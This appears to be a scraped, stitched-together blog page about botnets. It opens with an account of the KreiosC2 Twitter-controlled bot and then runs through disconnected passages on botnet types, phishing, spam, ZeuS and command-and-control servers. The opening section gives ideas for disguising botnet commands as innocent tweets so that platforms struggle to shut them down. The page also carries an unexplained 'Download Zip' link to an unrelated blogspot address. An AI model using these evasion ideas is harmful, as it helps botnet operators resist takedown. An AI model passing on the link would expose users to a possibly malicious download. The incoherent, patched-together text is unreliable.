KreiosC2 is a proof of concept bot which uses various unusual systems as its Command and Control channel. Obviously this can be used for malicious purposes but also for good ones, for example you can set up a bot at home to listen to your Twitter feed and perform actions on it. I'll discuss the potentially malicious use of it here but it would be easy to take the concepts and use them for good.
Twitter Being Used As Botnet Command Channel
Download Zip: https://chriswisketawd.blogspot.com/?file=2vAzHq
In this release I've separated the code which downloads the messages from the main body of the application in the same way as the languages are self contained files. This allowed me to add new command channels as well as the original Twitter.
My first idea was to have a protected twitter account which only the bots could read. This would restrict who could see the commands but it would be easy for Twitter to block that user. My next thought was to send the commands to random accounts and then have the bot use the search feature to find the commands. This would mean that it would be harder for Twitter to block the messages as the commands could be posted from any account to any other account. For this to work the bot would have to have a way to spot the commands in the general mess of other tweets out there. The problem with this is that if the bot can spot the commands then Twitter could also do the same matching and automatically drop those tweets. This is a harder one to defend against. My plan to defeat this would be to use seemingly innocent commands, such as "check out this link ..." to say download a file, which would be hard for Twitter to block without upsetting legitimate users but I don't know how hard it would be to create a command language based on this.
I proposed these ideas to Tom Eston (from the Security Justice Podcast), who is currently doing work on social media botnets, and to Mubix (who everyone knows). Tom suggested using TinyURL to obfuscate commands or to use hash tags to represent certain things. You could also get the bots to follow certain accounts to mark themselves as bots. If they followed a specific bot master account then they would be easy to spot but having them follow a general account, the BBC say, again they could be lost in the masses unless you knew where to look. Tom is giving a talk at Notacon where he will be talking a bit more about this and other social media bots.
Hopefully this gives you an idea of the potential for using channels other than IRC to control a bot or botnet. Versions 1 and 2 both suffer from the problem that once someone reverse engineers a bot and works out the command syntax it would probably be possible for Twitter to shut the system down fairly well, however, as version 3 now allows you to switch channels it makes the job of shutting down the network much harder, and if the reverse engineering job was made hard enough and the methods of hiding the commands made either very generic or just maybe a really large amount of them, maybe 50 different ways to say execute a command, then it would take admins a while to workout the fix and implement it which may just give the bad guys the edge they need.
Botnets are one of the most important threats towards nowadays users of the Internet. The joint of malware capabilities to be exploited in the network services and the increasing number of daily transactions performed in the cloud, makes them an attractive target for cybercriminals who have evolved their old IRC-based communication channels, into decentralized P2P networks, HTTP/S botnets and even Twitter-controlled networks. Against this background, this article analyses the threat that will affect computer networks in the upcoming years by going through these different Command & Control channels used by botmasters to keep the control of their hijacked networks.
Among the server check-ins, one stood out: o@ns6934944.ip-54-36-49.eu (54.36.49.151). This host is a known exploit source reported by Bad Packets. On two occasions the IP was reported as the exploit attempt source IP used in Muhstik botnet activity . Muhstik, which was described in our last blog, has similar tactics as TeamTNT including targeting cloud infrastructure, the use of an IRC botnet and XMRig cryptominer.
Typically, the bot herder will hijack a network of computer systems to create a botnet and then use it to execute various types of cyberattacks like scams, brute force attacks, malware invasions, etc. A bot-master then directs a group of hacked computers using remote commands. After compiling the bots, the herder utilizes command programming to control their other behaviors and aid the bot-master in fulfilling the ultimate ulterior motive.
While the purpose of all botnets is the same (i.e., use one or more computers remotely to launch a large-scale and hard-to-trace attack), different types of botnets approach this object in different ways. Some of the most commonly used types of botnets include:
An internet relay chatbot (IRC bot) is an application that automates tasks and interactions in an IRC chat room or channel, appearing to be a real user. While IRC chatbots can be legitimate, the technology is often exploited to carry out botnet attacks.
Some bad actors may prefer manual botnets over fully autonomous ones when performing an attack on another party due to the superior control they provide. When directed by the attacker, these tools may be used to start an attack from any compromised machine. Some botnets may even receive updates to their malicious code from a remote repository. On the plus side, owing to the human interaction required, they may be simpler to detect and track.
On a computer, network, or software program, a backdoor is any technique by which both authorized and unauthorized users may defeat standard security measures to get high-level user access (also known as root access). Once inside, hackers may pilfer personal and financial information, run other software, and control linked devices. Backdoor botnets use compromised machines to corrupt other devices and add these to a collection of bots that the perpetrator may command.
These types of botnets are controlled and commanded by a bot-master for remote process execution. Botnets are often installed on compromised devices through several methods of remote code installation. To avoid identification by investigators and law enforcement, the bot-master will frequently conceal their identity using proxies, The Onion Router or Tor network, and shells. To enable control remotely, the bots are set up to authenticate command and control stations using a password and keys.
Botnets can be used to spread malware through phishing emails. Phishing is a social engineering attack commonly used to obtain user information, such as login credentials and credit card details. It happens when an attacker poses as a secure entity and tricks the victim into opening an email, instant message, or text. The recipient is duped into clicking a malicious link, resulting in malware installation, system freeze, ransomware assault, or the exposure of sensitive information. When botnets carry out phishing campaigns, they become challenging to trace.
Botnets are responsible for most internet spam attacks, including email spam, comment section spam, form spam, etc. Spam attacks are frequently used to distribute malware and make phishing attempts, and there are botnets capable of sending out tens of billions of spam messages per day. A typical example of botnet-based spam attacks is fraudulent online reviews, where a fraudster takes over user devices, and posts spam online reviews in bulk without actually using the service or product.
For example, the ZeuS botnet is primarily intended to steal account information from numerous eCommerce, banking, and social media sites. A ZeuS botnet attack occurred in 2007, is considered one of the most notorious attacks in history. It was first intended to obtain end-user banking information via spam or phishing emails. The attacker used a Trojan horse application distributed via a botnet to infect the devices.
The most commonly used method of launching a botnet attack is to lure the target. To prevent the risk of botnet attacks, one should avoid downloading attachments from untrusted or unknown sources. It is preferable to password-protect PDFs for professional correspondence so that they do not serve as a means to a botnet attack.
Using a strong password is a wise method for reducing the likelihood of a botnet attack. Two-factor authentication (2FA) can keep botnet malware away from the devices, making them safer. It ensures that users verify downloads and email communications through multiple channels, and the botnet cannot perform surreptitious activities without access to both sets of authentication information.
A common infection vector used by botnet creators is scanning the Internet for web vulnerabilities to exploit for malware or back doors. The advantage of hitting servers over personal consumer devices is the ability to leverage powerful hardware that is always online and has high bandwidth. Also, many servers do not have anti-virus solutions in place.
Once the bot is in place, the infected server will connect to an IRC channel to retrieve commands from the botnet master, as shown in Figures 2 and 3. While joining the IRC, F5 researchers observed that the botnet has more than 2,500 victims at the time of this writing, including production servers. And this number is just for a single IRC channel.
A command-and-control server (C&C server) is a computer that issues directives to digital devices that have been infected with rootkits or other types of malware, such as ransomware. C&C servers can be used to create powerful networks of infected devices capable of carrying out distributed denial-of-service (DDoS) attacks, stealing data, deleting data or encrypting data in order to carry out an extortion scheme.
After the successful invasion of a device, a threat actor establishes communication with the malicious C&C server to send instructions to the infected host and form a malicious network. A malicious network under a C&C server's control is called a botnet and the network nodes that belong to the botnet are sometimes referred to as zombies. Beaconing can also be used between the infected device and the C&C server to deliver instructions or additional payloads. 2ff7e9595c
Comentarios